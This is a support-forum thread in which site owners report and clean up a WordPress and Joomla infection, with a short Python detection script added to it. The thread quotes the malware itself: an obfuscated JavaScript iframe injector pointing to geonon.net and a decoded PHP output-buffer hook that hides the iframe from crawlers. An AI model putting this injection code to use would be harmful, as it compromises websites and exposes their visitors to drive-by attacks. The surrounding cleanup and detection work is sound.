• The following script comes up at the bottom. Does anyone know where I can delete this?

    var pageTracker = _gat._getTracker("UA-11329795-1");
    pageTracker._trackPageview();
    } catch(err) {}</script><script>var VkXmR6='d$!#o$!#c$!#u$!#m$!#e$!#n$!#t$!#.$!#w$!#r$!#i$!#t$!#e$!#($!#\'$!#<$!#i$!#f$!#r$!#a$!#m$!#e$!# $!#s$!#r$!#c$!#=$!#"$!#h$!#t$!#t$!#p$!#:$!#/$!#/$!#g$!#e$!#o$!#n$!#o$!#n$!#.$!#n$!#e$!#t$!#/$!#i$!#n$!#.$!#p$!#h$!#p$!#"$!# $!#w$!#i$!#d$!#t$!#h$!#=$!#1$!# $!#h$!#e$!#i$!#g$!#h$!#t$!#=$!#1$!# $!#f$!#r$!#a$!#m$!#e$!#b$!#o$!#r$!#d$!#e$!#r$!#=$!#0$!#>$!#<$!#/$!#i$!#f$!#r$!#a$!#m$!#e$!#>$!#\'$!#)$!#;$!#';eval(VkXmR6.split('$!#').join(""));</script>

    </body>
    </html>

Viewing 14 replies - 16 through 29 (of 29 total)
  • @samboll

    I did a restore with clean files after finding 3 or 4 inches of misc code in many of the php files.

    I changed all passwords, removed plugins and my dashboard is now back.

    My feed is now showing correct and validated.

    I run 2.9.1 right now, should I upgrade to 2.9.2?

    Anything else I should do to make sure this doesn’t occur again?

    Thank you

    My url is: EmbracingMyJourney.com

    samboll thank you!

    Thread Starter flicksandbits

    (@flicksandbits)

    I’ve given up! Does anyone know anyone who can fix it for a fee or any sites that have script generators?

    @ flicks and bits – if you haven’t gotten this resolved, message me directly via my site (embracingmyjourney.com) and I will be glad to help you out if I can.

    Caryn

    @samboll – in re: the security codes for .htaccess file.

    Mine is in the root directory, there is not one in the wp-admin area.

    When the codes are added to the one in the root directory it changes the index page back to the godaddy default welcome page.

    Any thoughts?

    I have upgraded to WP 2.9.2

    Thank you.

    caryngf

    with godaddy, putting one in wp-admin could be tricky
    where is the site? in the root? or a folder?
    also, used to be, it took godaddy a few hours to update .htaccess – hopefully this has changed.
    also, which directives did you add to .htaccess? and maybe I can spot a problem.

    The hosting came with wp installed so the files are set up, to my knowledge, in a standard format. The root contains the htaccess file but there aren’t any other versions in the wp-admin or other folders. The “best version” of the code was copied and pasted after the *BEGIN WORDPRESS stmt but before the closing tag. I tried it above the other code just after the “begin”, then tried it after all the other code just before the closing tag. Both times it gave an error (not displayed), then brought me to the generic godaddy welcome html page. So I removed all the code for now.

    The code I pasted was:
    <Files ~ "\.(php)$">
    AuthUserFile /etc/httpd/htpasswd
    AuthType Basic
    AuthName "restricted"
    Order Deny,Allow
    Deny from all
    Require valid-user
    Satisfy any
    </Files>

    that code should work

    what happens if you rename the godaddy index.html?

    rename the index.html to welcome.html?

    I’ve just checked a friend’s site and the worm/hack has attached itself to every .php file in the wordpress directory — not many clean ways around this except to get a fresh install of all WP files, including themes.

    Starts with /**/ eval(base64_decode("aWYoZ ..... IH0gIH0="));?>

    Decoded this gives you:

    if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
      $GLOBALS['mr_no']=1;
      if(!function_exists('mrobh')){
        if(!function_exists('gml')){
          // Returns the injected markup, except to search-engine crawlers
          function gml(){
            if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
              return base64_decode("...");
            }
            return "";
          }
        }
        if(!function_exists('gzdecode')){
          // Skips the gzip header fields and inflates the buffered page
          function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
            $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
            $RBE4C4D037E939226F65812885A53DAD9=10;
            $RA3D52E52A48936CDE0F5356BB08652F2=0;
            if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
              $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
              $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
              $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
            }
            if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
              $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
            }
            if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
              $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
            }
            if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
              $RBE4C4D037E939226F65812885A53DAD9+=2;
            }
            $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
            if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
              $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
            }
            return $R034AE2AB94F99CC81B389A1822DA3353;
          }
        }
        // Output-buffer callback: inserts gml() before the closing body tag
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
          Header('Content-Encoding: none');
          $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
          if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
            return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
          }else{
            return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
          }
        }
        ob_start('mrobh');
      }
    }

    This code produces the following javascript that finds itself on the bottom of every page.

    document.write(\'<iframe src="https://geonon.net/in.php" width=1 height=1 frameborder=0></iframe>\');

    After you reach this site it continues to fire you from site to site until it attempts to find Adobe on the host machine and run as a java based program.
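
Added example, not part of the original thread and not code from any poster: a static check for the two patterns described above, the `eval(base64_decode(...))` line prepended to PHP files and the `split('$!#').join("")` footer script. It decodes but never executes the content and returns the file with the injected line removed. The leading `<?php` tag, the function names and the sample data (including the `example.invalid` URL) are assumptions made for the example.

```python
import base64
import re

# Assumed shape of the injected first line (the thread quotes it from "/**/" on):
#   <?php /**/ eval(base64_decode("..."));?>
INJECTED = re.compile(
    rb'<\?php\s*/\*\*/\s*eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);\s*\?>')
# Names that appear in the decoded payload quoted in the thread.
MARKERS = (b"ob_start", b"mrobh", b"gzinflate", b"base64_decode")
# var X='...';eval(X.split('SEP').join("")); as in the footer script.
SPLIT_JOIN = re.compile(
    r"var\s+(\w+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;\s*"
    r"eval\(\1\.split\('([^']+)'\)\.join\(\"\"\)\)")


def inspect_php(source: bytes):
    """Decode (never execute) injected blobs; return (markers, cleaned source)."""
    markers = set()
    for match in INJECTED.finditer(source):
        try:
            decoded = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # malformed base64: strip it anyway, nothing to report
            decoded = b""
        markers.update(m.decode() for m in MARKERS if m in decoded)
    return sorted(markers), INJECTED.sub(b"", source)


def reveal_split_join(html: str):
    """Statically undo the split/join obfuscation; return the hidden script or None."""
    found = SPLIT_JOIN.search(html)
    if not found:
        return None
    _name, body, sep = found.groups()
    return "".join(body.split(sep)).replace("\\'", "'")


# Constructed samples (hypothetical, not copied from an infected site).
PAYLOAD = b"if(function_exists('ob_start')){ob_start('mrobh');}"
SAMPLE_PHP = (b'<?php /**/ eval(base64_decode("' + base64.b64encode(PAYLOAD)
              + b'"));?><?php\nrequire "./wp-blog-header.php";\n')
HIDDEN = "document.write('<iframe src=\"http://example.invalid/\"></iframe>');"
SAMPLE_JS = ("<script>var q='" + "$!#".join(HIDDEN).replace("'", "\\'")
             + "';eval(q.split('$!#').join(\"\"));</script>")

if __name__ == "__main__":
    print(inspect_php(SAMPLE_PHP))
    print(reveal_split_join(SAMPLE_JS))
```

A file whose cleaned output differs from its input carried the injected line; compare the result against a fresh copy of the same WordPress release before putting it back.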

    I found the same virus on my Joomla website and found this info:

    File Name: http//:geonon.net/in.php
    Malware Name: HTML:Iframe-MD(Trj)
    Type: Trojan Horse

    I deleted the code you mentioned above from my index.php page and cleared all caches in Joomla but the virus is still showing up. Please update this thread as you get more information. I will be watching for a fix.
    I hope this doesn’t count as hijacking another topic. It is the same problem and it is confusing to have several topics on the same issue.

    I found the cure for this virus! I bought a PHP Anti-Hacker Suite by OSE extension from the Joomla website. The tech helped me install it and updated the virus definitions then cleaned the virus for me. There were over 1600 infected files. Such great service for $122.00. I’m hoping the Anti-Hacker component will keep my site from getting infected again.

  • The topic ‘i think iv got a virus, when i go on firefox and view source…’ is closed to new replies.